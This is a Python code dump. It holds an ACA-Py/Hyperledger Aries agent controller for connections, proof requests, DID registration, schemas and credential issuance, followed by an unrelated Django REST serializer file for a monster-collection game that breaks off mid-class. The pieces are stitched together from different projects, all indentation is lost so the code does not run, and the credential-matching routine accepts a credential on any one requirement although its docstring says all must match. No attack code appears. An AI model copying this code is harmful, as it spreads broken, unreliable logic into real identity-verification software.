conn = self._update_connection(connection_id=connection_id, auto_accept=auto_accept, auto_ping=auto_ping,
alias=alias)
# Print invitation to share it with an external agent
invitation = invitation_response["invitation"]
print(colored("\nCopy & paste invitation and share with external agent(s):", COLOR_INPUT, attrs=["bold"]))
pprint(invitation)
# Return whole invitation if multi_use is true (to be able to store it)
if multi_use is True:
return invitation
# Return only connection_id (as there is only one when multi_use is false)
else:
return connection_id
def receive_connection_invitation(self, alias: Optional[str] = None, auto_accept: bool = True,
auto_ping: bool = True) -> str:
"""
Function to respond to a connection invitation received by an external agent
Args:
alias: name for the connection
auto_accept: Automatically accept the response by the inviting external agent
auto_ping: Automatically ping agent on other end of connection
Returns: connection_id of connection (as string)
"""
# Ask user to paste invitation from external agent
print(colored("Please enter invitation received by external agent:", COLOR_INPUT, attrs=["bold"]))
invitation = input(colored("Invitation: ", COLOR_INPUT))
invitation = ast.literal_eval(invitation) # Convert string invitation from input into a dict
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
invitation_response = loop.run_until_complete(
self.agent_controller.connections.receive_invitation(invitation, alias, str(auto_accept).lower())
)
# Get connection_id and store as a new connection in self
connection_id = invitation_response["connection_id"]
conn = self._update_connection(connection_id=connection_id, auto_accept=auto_accept, auto_ping=auto_ping,
alias=alias)
# Ask user to accept invitation if auto_accept is set to False
self._accept_connection_invitation(connection_id, auto_accept=auto_accept)
return connection_id
def _accept_connection_invitation(self, connection_id: str, auto_accept: bool = True, label: Optional[str] = None,
endpoint=None) -> None:
"""
Accept the connection invitation sent by an external agent
Args:
connection_id: connection id of invitation
label: own label for invitation
endpoint: own endpoint
Returns: -
"""
if auto_accept is False:
choice = get_choice("Accept invitation {c}?".format(c=connection_id),
no_text="Please execute agent_controller.connections.accept_invitation(connection_id) to proceed")
if choice is True:
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_invitation(connection_id, label, endpoint)
)
def _accept_invitation_response(self, connection_id: str, auto_accept: bool = True) -> None:
"""
Accept the response sent by an external agent (usually through _accept_connection_invitation) as a result of an invitation sent by self.agent_controller
Args:
connection_id: connection id of the invitation sent
auto_accept: auto accept invitation or not
Returns: -
"""
# Do nothing if auto_accept is True (agent does it automatically)
# If auto_accept is False, prompt user to accept request
if auto_accept is False:
choice = get_choice("Accept invitation request response by external agent?",
"Please execute agent_controller._accept_connection_invitation() to proceed")
if choice is True:
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_request(connection_id)
)
def _trust_ping(self, connection_id: str, auto_ping: bool) -> None:
"""
Send trust_ping to external agent to finalize the connection after sending an invitation
Args:
connection_id:
Returns:
"""
# Prompt user to decide whether to sent a trust ping or not
if auto_ping is False:
choice = get_choice("Send trust ping to finalize connection?",
no_text="Please execute agent_controller._trust_ping(connection_id) to finalize the connection")
if choice is True:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.trust_ping(connection_id, "Send trust ping")
)
else:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.trust_ping(connection_id, "Send automated trust ping")
)
def _accept_invitation_request(self, connection_id: str, auto_accept: bool) -> None:
"""
Accept invitation request if auto_accept is False
Args:
connection_id:
auto_accept:
Returns:
"""
# Do nothing if auto_accept is True (agent does it automatically)
# If auto_accept is False, prompt user to accept request
# @todo: verify why this does not work!!!
if auto_accept is False:
# print(colored("Accept invitation request?", COLOR_INPUT))
# choice = input("Please respond [yes/no] ")
# choice = True if choice == "yes" else False
#
# #choice = get_choice("Accept invitation request?", "Did not accept invitation request.")
# if choice is True:
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.connections.accept_request(connection_id)
)
def send_message(self, connection_id: str, basic_message: str, duet_print: bool = False) -> None:
"""
Send basic message between agent and another external agent at the other end of the connection
Args:
connection_id: id of connection over which to send a message
basic_message: message to be sent via connection with connection_id
Returns: -
"""
# Loop until connection invitation is received
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.messaging.send_message(connection_id, basic_message)
)
if duet_print is True:
print(colored("♫♫♫ > Done!", COLOR_SUCCESS, attrs=["bold"]))
else:
print("Sent message via Connection ID {cid}".format(cid=connection_id))
def _connections_handler(self, payload: TypeDict) -> None:
"""
Handle incoming connections and print state information depending on the state of the incoming message.
Args:
payload: dictionary with information of incoming message
Returns: -
"""
state = payload['state']
connection_id = payload["connection_id"]
their_role = payload["their_role"]
routing_state = payload["routing_state"]
rfc_state = payload["rfc23_state"]
# Register new connection_id if it does not yet exist
if "alias" in payload:
conn = self._update_connection(connection_id=connection_id, alias=payload["alias"])
else:
conn = self._update_connection(connection_id=connection_id)
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Connections Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("State : ", colored("{s} ({r})".format(s=state, r=rfc_state), COLOR_INFO))
print("Routing State : {routing}".format(routing=routing_state))
if 'their_label' in payload:
their_label = payload['their_label']
print(f"Connection with : ", their_label)
conn = self._update_connection(connection_id=connection_id, connection_with=their_label)
print("Their Role : ", their_role)
print("---------------------------------------------------------------------")
if state == "active":
conn = self._update_connection(connection_id=connection_id, is_active=True)
print(colored("\nConnection ID: {0} is now active".format(connection_id), COLOR_SUCCESS, attrs=["bold"]))
elif rfc_state == "invitation-received":
self._accept_invitation_response(connection_id, conn.auto_accept)
elif rfc_state == "response-received":
self._trust_ping(connection_id, conn.auto_ping)
elif rfc_state == "request-received":
self._accept_invitation_request(connection_id, conn.auto_accept)
def _messages_handler(self, payload: TypeDict) -> None:
"""
Handles basicmessages that are received by webhook handler
Messages are processed as messages (appended to self.messages)
or as duet tokens (if "Duet Token" is in message content)
Args:
payload: webhook payload
Returns: -
"""
# Convert payload to message
message = Message(payload)
# If message is a duet token, process accordingly
if "Duet Token :" in message.content:
dci = message.content
dci = dci.replace("Duet Token : ", "")
# self.set_duet_config(message.connection_id, token=dci)
self._update_connection(connection_id=message.connection_id, token_partner=dci)
# Else store message in inbox (i.e., self.messages)
else:
self.messages.append(message)
class RelyingParty(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController) -> None:
super(RelyingParty, self).__init__(agent_controller)
self.role = "RelyingParty"
self.agent_listeners.append({"topic": "present_proof", "handler": self._relying_party_proof_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def send_proof_request(self, connection_id: str, proof_request: TypeDict, comment: str) -> str:
"""
Send proof request to a credential holder
Args:
connection_id: connection_id over which to request a proof
comment: comment for external agent
proof_request: dictionary with proof request information
Returns: presentation_exchange_id (needed to proceed with exchange of proof presentation)
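Example proof_request shape (illustrative sketch; the attribute name, restrictions, and the
schema id placeholder are assumptions, not values from this codebase):
    {
        "name": "Proof of Ownership",
        "version": "1.0",
        "requested_attributes": {
            "0_name_uuid": {"name": "name", "restrictions": [{"schema_id": "<schema-id>"}]}
        },
        "requested_predicates": {}
    }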
"""
# Define entire request that will be sent to the external agent
whole_request = {
"comment": comment,
"connection_id": connection_id,
"proof_request": proof_request,
"trace": False
}
# Await response from sending the request
loop = asyncio.get_event_loop()
proof_req_response = loop.run_until_complete(
self.agent_controller.proofs.send_request(whole_request)
)
return proof_req_response["presentation_exchange_id"]
def verify_proof_presentation(self, presentation_exchange_id: str) -> bool:
"""
Verify if the proof presentation sent by an external agent is valid
Args:
presentation_exchange_id: id of presentation to be verified
Returns: whether proof presentation is valid or not
"""
loop = asyncio.get_event_loop()
verified_response = loop.run_until_complete(
self.agent_controller.proofs.verify_presentation(presentation_exchange_id)
)
print("\n---------------------------------------------------------------------")
print(colored("Presentation Exchange ID {pei}".format(pei=presentation_exchange_id), attrs=["bold"]))
# Print verified status
verified = bool(verified_response["verified"]) # States whether the proof is valid or not
verified_color = COLOR_SUCCESS if verified is True else COLOR_ERROR
print("Presentation valid : ", colored(verified, verified_color))
# Parse revealed attributes
print("Revealed Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['revealed_attrs'].items():
attr_name = verified_response["presentation_request"]["requested_attributes"][name]["name"]
print("\t* {a} = {r}".format(a=attr_name, r=val['raw']))
# Parse self-attested attributes
print("Self-Attested Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['self_attested_attrs'].items():
print("\t* {n} = {v}".format(n=name, v=val))
# Parse predicate attributes
print("Predicate Attributes : ")
for (name, val) in verified_response['presentation']['requested_proof']['predicates'].items():
print("\t* {n} = {v}".format(n=name, v=val))
print("---------------------------------------------------------------------")
return verified
def _relying_party_proof_handler(self, payload: TypeDict) -> None:
"""
Enriches proof_handler with states specific to the relying party
Args:
payload: payload of incoming connection
Returns: -
"""
role = payload["role"]
connection_id = payload["connection_id"]
pres_ex_id = payload["presentation_exchange_id"]
state = payload["state"]
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Present-Proof Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("Presentation Exchange ID : ", pres_ex_id)
print("Protocol State : ", colored("{s}".format(s=state), COLOR_INFO))
print("Agent Role : ", role)
print("Initiator : ", payload["initiator"])
print("---------------------------------------------------------------------")
# Store presentation_exchange_id to connection
conn = self.get_connection(connection_id)
if pres_ex_id not in conn.presentation_exchange_ids:
conn.presentation_exchange_ids.append(pres_ex_id)
if state == "request_sent":
print(colored("\nPresentation Request : ", attrs=["bold"]))
pprint(payload["presentation_request_dict"])
elif state == "verified":
print(colored("\nPresentation Exchange ID: {pei} is verified".format(pei=pres_ex_id), COLOR_SUCCESS,
attrs=["bold"]))
class CredentialHolder(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController):
super(CredentialHolder, self).__init__(agent_controller)
self.role = "Holder"
self.agent_listeners.append({"topic": "present_proof", "handler": self._prover_proof_handler})
self.agent_listeners.append({"topic": "issue_credential", "handler": self._holder_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def is_vc_in_wallet(self, vc_referent: str) -> bool:
"""
Verifies if a verifiable credential named vc is within the wallet of an agent_controller
Storing a VC is done automatically if ACAPY_AUTO_STORE_CREDENTIAL=true in .env file
Args:
vc_referent: referent of the verifiable credential
Returns: True if VC is stored in wallet, False if it is not
"""
credentials = self.get_credentials()
if any(result["referent"] == vc_referent for result in credentials["results"]):
print(colored("Credential {vc} is stored in wallet.".format(vc=vc_referent), COLOR_SUCCESS))
return True
else:
print(colored(
"\nCredential {vc} is not stored in wallet.".format(
vc=vc_referent), COLOR_ERROR))
return False
def request_vc(self, connection_id: str, schema_id: str, auto_request: bool = False, auto_store: bool = False,
credential_id: Optional[str] = None) -> None:
"""
Fetch offer made by issuer and request record
Args:
auto_store: automatically store VC in wallet if True
auto_request: automatically request VC if True
schema_id: id of the schema agent wants a VC for
connection_id: connection id via which a vc was offered
Returns: -
"""
# Get all records to find the offer made by the external agent
loop = asyncio.get_event_loop()
records_response = loop.run_until_complete(
self.agent_controller.issuer.get_records(connection_id)
)
# Loop through records to find VC offer for schema_id
state = None
for record in records_response["results"]:
if record["schema_id"] == schema_id:
state = record["state"]
record_id = record["credential_exchange_id"]
break
# Return if no suitable offered vc was found
if state != "offer_received":
print(colored("Could not find requested VC offer", COLOR_ERROR, attrs=["bold"]))
return None
# See if user wants to request VC or not
if auto_request is False:
print(colored("\nRequest VC from offer", COLOR_INPUT, attrs=["bold"]))
choice = get_choice("Request VC", "VC will not be requested")
# Return None if user decided not to request VC
if choice is False:
print(colored("Did not request VC", COLOR_ERROR, attrs=["bold"]))
return None
else:
choice = False
# Send VC request (if conditions are given)
if (choice is True) or (auto_request is True):
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.send_request_for_record(record_id)
)
# Wait a little bit to see if handler sends message
time.sleep(3)
# Check if VC is stored. If not, store it
is_in_wallet = self.is_vc_in_wallet(record_id)
if is_in_wallet is False:
self._store_vc(record_id, auto_store, credential_id)
def _store_vc(self, record_id: str, auto_store: bool, referent: Optional[str] = None) -> None:
"""
Store VC. If auto_store is set to False, the user is prompted whether they want to store the VC or not.
Args:
record_id: ID of the VC that should be stored
auto_store: if True, store the VC without prompting the user
referent: alias name for the VC
Returns:
"""
# Prompt user to store VC if auto_store is not set to True
if auto_store is False:
print(
colored("\nDo you want to store the VC with ID {i}?".format(i=record_id), COLOR_INPUT, attrs=["bold"]))
choice = get_choice("Store VC: ", "VC not stored.")
# Return none if user does not want to store VC
if choice is False:
print(colored("VC not stored", COLOR_ERROR, attrs=["bold"]))
return None
# Ask for referent if none is given
if referent is None:
print(colored("\nPlease provide a referent (like an ID) for the VC", COLOR_INPUT, attrs=["bold"]))
print(colored("(The referent acts as the identifier for retrieving the raw credential from the wallet)",
COLOR_INPUT))
referent = input(
colored("Referent: ".format(r=record_id), COLOR_INPUT))
# Store credential in wallet
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.store_credential(record_id, referent)
)
print(colored("Successfully stored credential with Referent {r}".format(r=referent), COLOR_SUCCESS,
attrs=["bold"]))
def prepare_presentation(self, connection_id: str, thread_id: Optional[str] = None,
state: str = "request_received", role: str = "prover") -> Tuple[dict, str]:
# Find all presentation records that were sent to you
loop = asyncio.get_event_loop()
proof_records_response = loop.run_until_complete(
self.agent_controller.proofs.get_records(connection_id, thread_id, state, role)
)
# Get most recent presentation_exchange_id and the corresponding proof_request
conn = self.get_connection(connection_id)
presentation_exchange_id = conn.presentation_exchange_ids[-1]
proof_request = \
[p for p in proof_records_response["results"] if p["presentation_exchange_id"] == presentation_exchange_id][
0]
print(colored("> Found proof_request with presentation_exchange_id {pei}".format(pei=presentation_exchange_id),
COLOR_INFO))
# Get requirements from proof_request
requirements = self._get_proof_request_requirements(proof_request)
print(colored("> Restrictions for a suitable proof: {r}".format(r=requirements), COLOR_INFO))
# Compare all VCs in the wallet of the CredentialHolder, and check if one of them satisfies the requirements of the proof_request
suitable_credentials, revealed = self._get_suitable_vc_for_proof(requirements)
# Prepare presentation that will be sent to the RelyingParty
predicates = {}
self_attested = {}
presentation = {
"requested_predicates": predicates,
"requested_attributes": revealed,
"self_attested_attributes": self_attested,
}
print(colored("> Generate the proof presentation : ", COLOR_INFO))
pprint(presentation)
return presentation, presentation_exchange_id
def send_proof_presentation(self, presentation_exchange_id: str, presentation: dict) -> None:
"""
Send proof presentation
Args:
presentation_exchange_id: id of presentation that should be sent
presentation: presentation to send
Returns: -
"""
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.proofs.send_presentation(presentation_exchange_id, presentation)
)
def _get_proof_request_requirements(self, presentation_record: dict) -> dict:
"""
Returns dictionary with {<required-attribute>: <restrictions-of-attribute>} from presentation record
Args:
presentation_record: presentation record received
Returns: dictionary with requirements
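Example return value (illustrative; the attribute name and restriction are placeholders):
    {"name": {"requirements": {"schema_id": "<schema-id>"},
              "request_attr_name": "0_name_uuid"}}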
"""
# Setup
requirements = {}
presentation_request = presentation_record["presentation_request"]
# Get required attributes and requirements for the individual attributes
for attr_key, attr_val in presentation_request["requested_attributes"].items():
requirements[attr_val["name"]] = {}
requirements[attr_val["name"]]["requirements"] = attr_val["restrictions"][0]
requirements[attr_val["name"]]["request_attr_name"] = attr_key
return requirements
def _get_suitable_vc_for_proof(self, requirements: dict) -> Tuple[dict, dict]:
"""
Finds credentials amongst all credentials stored in the agent's wallet that satisfy the requirements provided by the relying party.
Args:
requirements: dictionary of required attributes and their restrictions, as produced by _get_proof_request_requirements
Returns: tuple of ({<attribute-name>: <suitable-credential>}, {<request-attr-name>: {"cred_id": <referent>, "revealed": True}}), where each suitable credential satisfies all requirements
"""
# Get all current credentials that will be considered when finding a suitable credential
loop = asyncio.get_event_loop()
credentials = loop.run_until_complete(
self.agent_controller.credentials.get_all()
)
# Setup
relevant_credentials = {}
revealed = {}
credentials = credentials["results"]
# Iterate through attribute name and attribute requirements of relying party
for name, conditions in requirements.items():
req = conditions["requirements"]
req_name = conditions["request_attr_name"]
# Skip credential if the required attribute name is not in any credential,
# or if all requirements (e.g., schema_id) are not within one credential
if (any(name in cred["attrs"] for cred in credentials) is False) or (
any(r in cred.keys() for r in req for cred in credentials) is False):
continue
# Iterate through credentials
for cred in credentials:
# Verify if requirement value (r_val) and credential value (cred[r_key]) match for required attribute (r_key)
for r_key, r_val in req.items():
try:
# Append cred to relevant_credentials if all requirements match
if (cred[r_key] == r_val) is True:
relevant_credentials[name] = cred
print(colored(
"> Attribute request for '{name}' can be satisfied by Credential with VC '{c}'".format(
name=name, c=cred["referent"]), COLOR_INFO))
revealed[req_name] = {"cred_id": cred["referent"], "revealed": True}
except Exception as e:
print(e)
return relevant_credentials, revealed
def _holder_handler(self, payload: TypeDict) -> None:
"""
Handle connections that are holder-specific
Args:
payload: dictionary with payload of incoming connection
Returns:
"""
# Get relevant attributes
connection_id = payload['connection_id']
exchange_id = payload['credential_exchange_id']
state = payload['state']
role = payload['role']
# Print
print("\n---------------------------------------------------------------------")
print(colored("Handle Issue Credential Webhook: Issue Credential Handler", attrs=["bold"]))
print(f"Connection ID : {connection_id}")
print(f"Credential exchange ID : {exchange_id}")
print("Agent Protocol Role : ", role)
print("Protocol State : ", colored(state, COLOR_INFO))
print("---------------------------------------------------------------------")
# Handle different states
if state == "offer_received":
proposal = payload["credential_proposal_dict"]["credential_proposal"]
print(colored("\nProposed Credential : ", attrs=["bold"]))
pprint(proposal)
elif state == "credential_acked":
credential = payload["credential"]
print(colored("\nReceived Credential :", attrs=["bold"]))
pprint(credential)
def _prover_proof_handler(self, payload: TypeDict) -> None:
"""
Handle incoming prover proof connections
Args:
payload: dictionary with payload of incoming connection
Returns: -
"""
# Get attributes
role = payload["role"]
connection_id = payload["connection_id"]
pres_ex_id = payload["presentation_exchange_id"]
state = payload["state"]
# Print
print("\n---------------------------------------------------------------------")
print(colored("Connection Webhook Event Received: Present-Proof Handler", attrs=["bold"]))
print("Connection ID : ", connection_id)
print("Presentation Exchange ID : ", pres_ex_id)
print("Protocol State : ", colored(state, COLOR_INFO))
print("Agent Role : ", role)
print("Initiator : ", payload["initiator"])
print("---------------------------------------------------------------------")
# Store presentation_exchange_id to connection
conn = self.get_connection(connection_id)
if pres_ex_id not in conn.presentation_exchange_ids:
conn.presentation_exchange_ids.append(pres_ex_id)
# Handle different states
if state == "request_received":
print(colored("Obtained Proof Request : ", attrs=["bold"]))
pprint(payload["presentation_request"])
elif state == "presentation_acked":
print(colored("\nPresentation Exchange ID: {pei} is acknowledged by Relying Party".format(pei=pres_ex_id),
COLOR_SUCCESS, attrs=["bold"]))
class IssuingAuthority(AgentConnectionManager):
def __init__(self, agent_controller: AriesAgentController) -> None:
super(IssuingAuthority, self).__init__(agent_controller)
self.role = "Issuing Authority"
self.agent_listeners.append({"topic": "issue_credential", "handler": self._issuer_handler})
self.agent_controller.register_listeners(self.agent_listeners, defaults=False)
print(
colored("Successfully initiated AgentConnectionManager for a(n) {role} ACA-PY agent".format(role=self.role),
COLOR_SUCCESS, attrs=["bold"]))
def get_did(self) -> Optional[dict]:
"""
Verifies if an agent already has a public DID or not. If it does not, the function generates a new DID.
Returns: dictionary with DID information of the agent
"""
try:
# Verify if agent already has a public DID
loop = asyncio.get_event_loop()
public_did_response = loop.run_until_complete(
self.agent_controller.wallet.get_public_did()
)
# Either use the existing DID
if public_did_response["result"]:
did_obj = public_did_response["result"]
state = "found an existing"
# Or create a new DID
else:
loop = asyncio.get_event_loop()
create_did_response = loop.run_until_complete(
self.agent_controller.wallet.create_did()
# todo: this is where BSS NEEDS TO BE IMPLEMENTED (see https://github.com/hyperledger/aries-cloudagent-python/blob/main/demo/AliceWantsAJsonCredential.md)
# @todo: check out create_did here: https://github.com/OpenMined/PyDentity/blob/master/libs/aries-basic-controller/aries_basic_controller/controllers/wallet.py
# @todo and https://github.com/hyperledger/aries-cloudagent-python/blob/main/JsonLdCredentials.md
)
did_obj = create_did_response['result']
state = "created a new"
print(colored("Successfully {s} DID:".format(s=state), COLOR_SUCCESS, attrs=["bold"]))
pprint(did_obj)
return did_obj
except Exception as e:
print(colored("Failed to get DID: ", COLOR_ERROR, attrs=["bold"]), e)
return None
def write_did_to_ledger(self, did_obj: dict, url: str = "http://dev.greenlight.bcovrin.vonx.io/register",
payload=None) -> None:
"""
Write DID to ledger (by default: the BCovrin dev/greenlight test ledger)
Args:
did_obj: dictionary with DID information of agent
url: url to network
payload: payload with header information
Returns: -
"""
# Variables
if payload is None:
payload = {"seed": None, "did": did_obj["did"], "verkey": did_obj["verkey"]}
headers = {} # Empty header, because payload includes all information
# Send request
r = requests.post(url, data=json.dumps(payload), headers=headers)
response = r.json()
print(response)
def make_did_public(self, did_obj: dict) -> None:
"""
Assign agent with a public DID if it is not already set as public (can be the case if the containers were not properly shut down)
Args:
did_obj: dictionary with DID information of an agent
Returns: -
"""
if did_obj["posture"] != "public":
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.wallet.assign_public_did(did_obj["did"])
)
print(colored("Successfully initialized agent with Public DID: {d}".format(d=did_obj["did"]), COLOR_SUCCESS,
attrs=["bold"]))
else:
print("Agent already has Public DID: {d}".format(d=did_obj["did"]))
def accept_taa_agreement(self) -> None:
"""
Accept TAA agreement to be able to define schemes and issue VCs as an issuing authority
Returns: -
"""
print("--------------------------------- TRANSACTION AUTHOR AGREEMENT (TAA) ---------------------------------")
print(colored("Source: https://sovrin.org/preparing-for-the-sovrin-transaction-author-agreement/", COLOR_INFO))
print(colored("Accessed: Aug 16, 2021)", COLOR_INFO))
print("\n\"As a global public ledger, the Sovrin Ledger and all its participants are subject to privacy")
print("and data protection regulations such as the EU General Data Protection Regulation (GDPR).")
print("These regulations require that the participants be explicit about responsibilities for Personal Data.")
print("\nTo clarify these responsibilities and provide protection for all parties, the Sovrin Governance")
print("Framework Working Group developed an agreement between Transaction Authors and the Sovrin Foundation.")
print("The TAA can be found at Sovrin.org. It ensures that users are aware of and consent to the fact that")
print("all data written to the Sovrin Ledger cannot be removed, even if the original author of the transaction")
print("requests its removal.")
print("\nThe TAA outlines the policies that users must follow when interacting with the Sovrin Ledger.")
print("When a user's client software is preparing a transaction for submission to the network, it must include")
print("a demonstration that the user had the opportunity to review the current TAA and accept it. This is done")
print("by including some additional fields in the ledger write transaction:")
print("\t* A hash of the agreement")
print("\t* A date when the agreement was accepted, and")
print("\t* A string indicating the user interaction that was followed to obtain the acceptance.")
print("\nThe Indy client API used by Sovrin has been extended to allow users to review current and past")
print("agreements and to indicate acceptance through an approved user interaction pattern.\"")
print("------------------------------------------------------------------------------------------------------")
choice = get_choice("Do you accept the TAA?", "You cannot proceed until you accept the TAA.")
if choice is True:
try:
# Get TAA agreement
loop = asyncio.get_event_loop()
taa_response = loop.run_until_complete(
self.agent_controller.ledger.get_taa()
)
TAA = taa_response['result']['taa_record']
# Accept TAA
TAA['mechanism'] = "service_agreement"
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.ledger.accept_taa(TAA)
)
print(colored("Successfully signed TAA agreement", COLOR_SUCCESS, attrs=["bold"]))
except Exception as e:
print(colored("Failed to accept TAA agreement: ", COLOR_ERROR, attrs=["bold"]), e)
else:
print(
colored("Cannot define schemes nor issue VCs if the TAA is not accepted", COLOR_ERROR, attrs=["bold"]))
def write_vc_schema(self, schema_name: str, schema_version: str, attributes: list) -> Optional[str]:
"""
Writes and defines schema that the issuing authority will be able to issue
Args:
schema_name: name of the schema
schema_version: version of the schema
attributes: list of attributes that are part of the schema
Returns: schema_id
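Example (illustrative; issuer is a hypothetical IssuingAuthority instance and the schema
name, version, and attributes are placeholders):
    schema_id = issuer.write_vc_schema("certificate", "0.0.1", ["name", "date"])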
"""
# Write schema and await response
try:
# Write schema to agent
loop = asyncio.get_event_loop()
response = loop.run_until_complete(
self.agent_controller.schema.write_schema(schema_name, attributes, schema_version)
)
# Process response
schema_id = response["schema_id"]
print(colored("Successfully wrote {n} schema:".format(n=schema_name), COLOR_SUCCESS, attrs=["bold"]))
pprint(response)
return schema_id
except Exception as e:
print(colored("Failed to write {n} schema: ".format(n=schema_name), COLOR_ERROR, attrs=["bold"]), e)
return None
def write_vc_cred_def(self, schema_id: str, tag: str = "default", support_revocation: bool = False) -> str:
"""
Writes a credential definition transaction to the public ledger to specify the public cryptographic
material the agent uses to sign all credentials issued against the schema with schema_id
Args:
schema_id: id of the schema
tag: tag of the credential definition
support_revocation: make the credential definition support revocation. Requires the ACAPY_TAILS_SERVER_BASE_URL env
variable to be properly configured
Returns: credential definition id as string
"""
loop = asyncio.get_event_loop()
cred_def_response = loop.run_until_complete(
self.agent_controller.definitions.write_cred_def(schema_id, tag, support_revocation)
)
cred_def_id = cred_def_response["credential_definition_id"]
print(colored("Successfully wrote credential definition id: {cdef}".format(cdef=cred_def_id), COLOR_SUCCESS,
attrs=["bold"]))
return cred_def_id
def offer_vc(self, connection_id: str, schema_id: str, cred_def_id: str,
credential_attributes: Optional[list] = None, comment: Optional[str] = None,
auto_remove: bool = True, trace: bool = False) -> None:
"""
Gets the schema by ID and lets the issuer fill out the attributes, to then offer a VC to the external
agent
Args:
connection_id: ID of the connection to which a VC should be offered
schema_id: ID of the schema
cred_def_id: id that authorizes the agent to issue a credential for that schema
credential_attributes: list of {"name": <name>, "value": <value>} dicts with vc information
comment: comment
auto_remove: remove credential record after it has been issued
trace: trace ACA-PY instance
Returns: -
"""
# Get schema information from issuing authority by ID of schema
loop = asyncio.get_event_loop()
schema_info = loop.run_until_complete(
self.agent_controller.schema.get_by_id(schema_id)
)
# Prompt user to enter credential attributes if they were not passed as an argument
if credential_attributes is None:
# Get list of attributes required by schema
attributes = schema_info["schema"]["attrNames"]
# Loop data input until user is happy with the data
happy = False
while happy is False:
print(colored("Please enter the following information for the {n} scheme: ".format(
n=schema_info["schema"]['name']), COLOR_INPUT, attrs=["bold"]))
credential_attributes = []
for attr in attributes:
value = input(colored("{n}: ".format(n=attr), COLOR_INPUT))
credential_attributes.append({"name": attr, "value": value})
# Ask user if the data was entered correctly
happy = get_choice("Is the information correct?", "Please enter the information again.")
# Send credential to external agent at the other end of the connection_id if all data is collected
loop = asyncio.get_event_loop()
loop.run_until_complete(
self.agent_controller.issuer.send_credential(connection_id, schema_id, cred_def_id, credential_attributes,
comment, auto_remove, trace)
)
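
# Hedged usage sketch (added for illustration, not part of the original file):
# a full issuance flow with the methods above might look like the following,
# assuming `issuer` is an instance of this class and `connection_id` refers to
# an active connection:
#
#   schema_id = issuer.write_vc_schema("demo-certificate", "0.0.1",
#                                      ["name", "issued_date"])
#   cred_def_id = issuer.write_vc_cred_def(schema_id, tag="default")
#   issuer.offer_vc(connection_id, schema_id, cred_def_id,
#                   credential_attributes=[
#                       {"name": "name", "value": "Alice"},
#                       {"name": "issued_date", "value": "2021-08-16"},
#                   ])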
def _issuer_handler(self, payload: TypeDict) -> None:
"""
Handles the payload for the Issuing Authority when issuing a verifiable credential
Args:
payload: dictionary with payload of incoming connection
Returns: -
"""
# Attributes
connection_id = payload['connection_id']
exchange_id = payload['credential_exchange_id']
state = payload['state']
role = payload['role']
# Print
print("\n---------------------------------------------------------------------")
print(colored("Handle Issue Credential Webhook: Issue Credential Handler", attrs=["bold"]))
print(f"Connection ID : {connection_id}")
print(f"Credential exchange ID : {exchange_id}")
print("Agent Protocol Role : ", role)
print("Protocol State : ", colored(state, COLOR_INFO))
print("---------------------------------------------------------------------")
# Handle different states
if state == "offer_sent":
offer = payload["credential_proposal_dict"]['credential_proposal']
print(colored("\nProposed Credential : ", attrs=["bold"]))
pprint(offer)

# -----------------------------------------------------------------------------
# Next source file: Django REST Framework serializers for a monster-collection
# app (bestiary / herders models).
# -----------------------------------------------------------------------------
from rest_framework import serializers
from bestiary.models import Monster, Skill, LeaderSkill, SkillEffect, ScalingStat, Source, \
HomunculusSkillCraftCost, HomunculusSkill
from herders.models import MonsterTag, RuneInstance, TeamGroup, Team, MonsterInstance, Summoner, ArtifactInstance
# Read-only monster database stuff.
class MonsterSourceSerializer(serializers.ModelSerializer):
class Meta:
model = Source
exclude = ['meta_order', 'icon_filename']
class MonsterSkillEffectSerializer(serializers.ModelSerializer):
class Meta:
model = SkillEffect
fields = ('name', 'is_buff', 'description', 'icon_filename')
class MonsterSkillScalingStatSerializer(serializers.ModelSerializer):
class Meta:
model = ScalingStat
fields = ('stat',)
class MonsterSkillSerializer(serializers.HyperlinkedModelSerializer):
skill_effect = MonsterSkillEffectSerializer(many=True, read_only=True)
scales_with = MonsterSkillScalingStatSerializer(many=True, read_only=True)
class Meta:
model = Skill
fields = (
'pk', 'com2us_id', 'name', 'description', 'slot', 'cooltime', 'hits', 'passive', 'aoe', 'max_level', 'level_progress_description',
'skill_effect', 'multiplier_formula', 'multiplier_formula_raw', 'scales_with', 'icon_filename',
)
class MonsterLeaderSkillSerializer(serializers.ModelSerializer):
attribute = serializers.SerializerMethodField('get_stat')
area = serializers.SerializerMethodField()
element = serializers.SerializerMethodField()
class Meta:
model = LeaderSkill
fields = ('attribute', 'amount', 'area', 'element')
def get_stat(self, instance):
return instance.get_attribute_display()
def get_area(self, instance):
return instance.get_area_display()
def get_element(self, instance):
return instance.get_element_display()
class HomunculusSkillCraftCostSerializer(serializers.ModelSerializer):
name = serializers.ReadOnlyField(source='craft.name')
icon_filename = serializers.ReadOnlyField(source='craft.icon_filename')
class Meta:
model = HomunculusSkillCraftCost
fields = ['name', 'quantity', 'icon_filename']
class HomunculusSkillSerializer(serializers.ModelSerializer):
